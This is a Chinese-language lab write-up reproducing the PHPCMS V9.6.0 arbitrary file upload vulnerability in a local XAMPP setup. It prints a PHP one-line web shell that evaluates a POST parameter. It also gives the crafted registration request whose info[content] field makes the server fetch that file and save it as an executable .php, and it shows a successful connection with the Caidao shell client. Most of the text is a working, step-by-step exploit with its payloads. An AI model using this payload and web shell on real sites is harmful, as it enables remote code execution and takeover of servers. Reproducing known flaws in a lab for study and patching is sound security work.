### 漏洞復(fù)現(xiàn)
使用XAMPP搭建好環(huán)境,,接著安裝PHPCMS V9.6.0。
[PHPCMS V9.6.0 官方下載地址](http://bbs.phpcms.cn/thread-933447-1-1.html)
在phpcms根目錄下寫入一句話木馬的txt記事本文件:
```<?php @eval($_POST['shell0']);?>```
![](/upload/attach/201804/201804091754_AN4UEPCA95R6H3H.jpg)
路徑為:
http://localhost/phpcms/shell.txt
![](/upload/attach/201804/201804091754_YWK2SKC3PCBUMTE.jpg)
此時(shí)是txt記事本文件,,解釋器解析不了里面的PHP代碼,,所以用菜刀連接失敗。
![](/upload/attach/201804/201804091755_9KPSP89ESXERJAD.jpg)
打開主頁(yè)找到注冊(cè)頁(yè)面,,填寫基本信息,,提交用burpsuite抓包:
![](/upload/attach/201804/201804091755_UXDHQQAHN5KE2EU.jpg)
![](/upload/attach/201804/201804091755_A4V4EHNFHNN8B3Z.jpg)
send to repeater:
修改request 請(qǐng)求包的payload:
```
siteid=1&modelid=1&username=usera&password=password&pwdconfirm=password&email=usera%40test.com&nickname=nichenga&info[content]=href=http://localhost/phpcms/shell.txt?.php#.jpg&dosubmit=1&protocol=
```
![](/upload/attach/201804/201804091755_TXU9U6AZ6XWH74D.jpg)
response標(biāo)黃的部分就是返回的shell地址,注意上面我們抓取的modelid值原本為10,,payload改成了數(shù)字1,,目的就是為了在response中顯示shell路徑。
```
http://localhost/phpcms/uploadfile/2018/0403/20180403044429440.php
```
這個(gè)路徑的文件就是PHP一句話小馬:
![](/upload/attach/201804/201804091755_RDDMD83ZC44R6PD.jpg)
用菜刀連接成功:
![](/upload/attach/201804/201804091756_YX9YBWE9SYQUJ6J.jpg)
### 注:用PHP7版本測(cè)試上面的一句話木馬是連接不了的,,使用PHP5可以連接成功,。
漏洞分析參考p0wd3r的[PHPCMS v9.6.0 任意文件上傳漏洞分析](https://www.seebug.org/vuldb/ssvid-92930)